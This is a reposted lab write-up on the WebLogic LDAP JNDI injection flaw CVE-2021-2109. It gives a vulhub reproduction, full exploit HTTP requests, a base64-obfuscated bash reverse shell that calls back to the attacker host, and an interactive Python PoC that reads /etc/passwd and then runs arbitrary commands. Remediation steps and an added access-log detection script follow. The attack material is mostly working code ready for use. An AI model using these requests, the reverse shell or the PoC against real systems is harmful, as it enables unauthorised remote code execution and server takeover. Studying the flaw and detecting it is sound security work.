Vulnerability name
- WebLogic LDAP remote code execution vulnerability
CVE ID
- CVE-2021-2109
JNDI overview
- JNDI is short for Java Naming and Directory Interface.
- It is the API (application programming interface) that provides naming and directory access services to Java applications.
Vulnerability description
- On 19 November 2020, Alibaba Cloud Security reported a WebLogic Server remote code execution vulnerability to Oracle.
- An attacker can perform a JNDI injection over the LDAP protocol, load a malicious class from a remote CodeBase, and ultimately execute arbitrary code to take control of the server.
Affected versions
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.3.0
- WebLogic Server 12.2.1.4.0
- WebLogic Server 14.1.1.0.0
Lab environment
- Target: docker weblogic 192.168.232.183
- LDAP server: 192.168.232.146
- Attacker: kali ip: 192.168.232.140
Step 1: Set up the environment
cd /Desktop/vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d

Step 2: Access the target (7001 is WebLogic's default port)
http://192.168.232.183:7001/

Step 3: Access the vulnerable endpoint to check whether the vulnerability is present
Visit http://192.168.232.183:7001/console/css/%252e%252e%252f/consolejndi.portal. If this page can be reached without authentication and the WebLogic version is one of the affected ones, the vulnerability is likely present.

Step 4: Start the LDAP server
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
unzip JNDIExploit.v1.11.zip
java -jar JNDIExploit.v1.11.jar -i ip   (ip is the attacker's address; this starts the LDAP service)


Reproduction steps
Step 1: Combine with the WebLogic unauthenticated access vulnerability to execute code remotely
GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.232.183:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
cmd: id
Cookie: ADMINCONSOLESESSION=gP6QBvU_6nELIrUKw_cS9md3rot7DdvT593UwSqzF20mWUOFjC7I!-1705112082
Connection: close
Note that the third separator in the LDAP server address is ; rather than . (192.168.232;146).
Step 2: Get a reverse shell and connect to the host
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMi4xNDAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.232.183:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
cmd: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMi4xNDAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}
Cookie: ADMINCONSOLESESSION=gP6QBvU_6nELIrUKw_cS9md3rot7DdvT593UwSqzF20mWUOFjC7I!-1705112082
Connection: close

In the shell, create the directory 2021 under /tmp and a file qwe.txt whose content is 123456.
Check the files inside the docker container:
docker ps
docker exec -it 7f1c1a15677a /bin/bash

Step 3: Exploit with the PoC to execute commands. The PoC prompts for the target URL and the LDAP URL:
http://192.168.232.183:7001
ldap://192.168.232;146:1389

Remediation
- Because the remote code execution is achieved through JNDI injection, upgrade the JDK version used by the WebLogic Server runtime;
- Disable the T3 protocol. If you do not rely on T3 for JVM communication, temporarily blocking T3 mitigates the impact of this vulnerability: 1) Log in to the WebLogic console, open the base_domain configuration page, go to the "Security" tab and click "Filters" to configure a filter. 2) In "Connection Filter" enter weblogic.security.net.ConnectionFilterImpl, and in "Connection Filter Rules" enter: * * 7001 deny t3 t3s
- Disable the IIOP protocol: log in to the WebLogic console, find the "Enable IIOP" option, untick it, and restart for the change to take effect.
- Temporarily block external access to the admin console at /console/console.portal.
- Apply the official security patch.
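The following detection helper is an added example, not part of the original write-up and not code from the JNDIExploit project. It scans constructed Apache-style access-log lines for the request pattern shown in the reproduction steps: it percent-decodes the path repeatedly so the double-encoded %252e%252e traversal becomes visible, flags consolejndi.portal reached through /console/css/, and extracts the JNDI callback address after turning the ; host separator back into a . so the real LDAP server can be blocked. The log lines, field layout and function names are assumptions.

```python
"""Access-log detector for the CVE-2021-2109 request pattern (added example; the
log lines, field layout and function names are constructed assumptions, not
from the original write-up or the JNDIExploit project)."""
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines: one exploitation attempt, one
# unauthenticated probe of consolejndi.portal, and two benign requests.
SAMPLE_LOG = [
    '192.168.232.140 - - [20/Jan/2021:10:01:02 +0000] "GET /console/css/%252e%252e/consolejndi.portal'
    '?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle='
    'com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22)'
    ' HTTP/1.1" 200 1337',
    '10.0.0.5 - - [20/Jan/2021:10:02:03 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4210',
    '192.168.232.140 - - [20/Jan/2021:10:03:04 +0000] "GET /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1" 200 8800',
    '10.0.0.6 - - [20/Jan/2021:10:04:05 +0000] "GET /console/css/console.css HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any JNDI provider URL inside the request marks a remote lookup. The host class
# allows ';' because the request in the write-up uses 192.168.232;146.
JNDI_URL_RE = re.compile(
    r'(?P<scheme>ldaps?|rmi|iiop)://(?P<host>[^:/"\s)]+)(?::(?P<port>\d+))?', re.IGNORECASE)
# /console/css/ is served without authentication; '..' after it escapes into
# the protected console tree.
TRAVERSAL_RE = re.compile(r'/console/css/\.\.')


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing. The exploit double-encodes
    '..' as %252e%252e, so a single decode still hides the traversal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def extract_jndi_target(decoded_query):
    """Return the JNDI callback URL with the ';' host separator normalised to '.',
    so the address is directly usable for blocking or threat-intel lookups."""
    m = JNDI_URL_RE.search(decoded_query)
    if not m:
        return None
    host = m.group('host').replace(';', '.')
    port = m.group('port')
    return f"{m.group('scheme').lower()}://{host}" + (f":{port}" if port else "")


def analyze_line(line):
    """Classify one access-log line; returns None when it is not a request line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    decoded_path = fully_decode(path)
    decoded_query = fully_decode(query)
    indicators = []
    if TRAVERSAL_RE.search(decoded_path):
        indicators.append('console_css_traversal')
    if decoded_path.rstrip('/').endswith('consolejndi.portal'):
        indicators.append('consolejndi_portal')
    if 'JndiBindingHandle(' in decoded_query:
        indicators.append('jndi_binding_handle')
    jndi_target = extract_jndi_target(decoded_query)
    if jndi_target:
        indicators.append('remote_jndi_lookup')
    # Severity: traversal plus a remote JNDI URL is the full exploit chain;
    # traversal alone is the unauthenticated probe; the remaining indicators can
    # also appear in legitimate admin use of the JNDI binding page.
    if jndi_target and 'console_css_traversal' in indicators:
        severity = 'critical'
    elif 'console_css_traversal' in indicators:
        severity = 'high'
    elif indicators:
        severity = 'low'
    else:
        severity = 'none'
    return {
        'client': line.split(' ', 1)[0],
        'path': decoded_path,
        'indicators': indicators,
        'jndi_target': jndi_target,
        'severity': severity,
    }


def scan_log(lines):
    """Return alerts for every line that carries at least one indicator."""
    alerts = []
    for line in lines:
        result = analyze_line(line)
        if result and result['indicators']:
            alerts.append(result)
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert['severity'], alert['client'], alert['indicators'], alert['jndi_target'])
```

Run against the constructed lines, the first line is reported as critical with the callback normalised to ldap://192.168.232.146:1389, the probe of consolejndi.portal is reported as high, and the two benign requests produce no alert. Decoding is capped at three rounds so a log line cannot make the scanner loop; the WebLogic path only needs two.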
PoC
import sys
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress the certificate warning raised by verify=False requests
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def title():
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mVersion: Weblogic 多個版本 \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
    print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m')
    print('+------------------------------------------')


def POC_1(target_url, ldap_url, cmd):
    # Double-encoded ".." escapes /console/css/ to consolejndi.portal; the LDAP URL is
    # placed inside JndiBindingHandle(...) and the command travels in the "cmd" header
    vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url)
    print('\033[36m[o] 正在請求: {}'.format(vuln_url))
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cmd": cmd
    }
    try:
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        # The first check runs "cat /etc/passwd"; "root:" in the body confirms execution
        if "root:" in response.text:
            print("\033[32m[o] 目標{}存在漏洞 \033[0m".format(target_url))
            print("\033[32m[o] 回應為:\n{} \033[0m".format(response.text))
        else:
            print("\033[31m[x] 命令執行失敗 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 請檢查引數和Ldap服務是否正確 \033[0m", e)


def POC_2(target_url, ldap_url, cmd):
    # Same request as POC_1, but prints the response body for an arbitrary command
    vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url)
    print('\033[36m[o] 正在請求: {}'.format(vuln_url))
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cmd": cmd
    }
    try:
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        print("\033[32m[o] 回應為:\n{} \033[0m".format(response.text))
    except Exception as e:
        print("\033[31m[x] 請檢查引數和Ldap服務是否正確 \033[0m", e)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    ldap_url = str(input("\033[35mLdap >>> \033[0m"))
    POC_1(target_url, ldap_url, cmd="cat /etc/passwd")
    # Interactive loop: each command is sent in the "cmd" header until "exit"
    while True:
        cmd = input("\033[35mCmd >>> \033[0m")
        if cmd == "exit":
            sys.exit(0)
        else:
            POC_2(target_url, ldap_url, cmd)
Please credit the source when reprinting. Original link: https://www.uj5u.com/qita/259180.html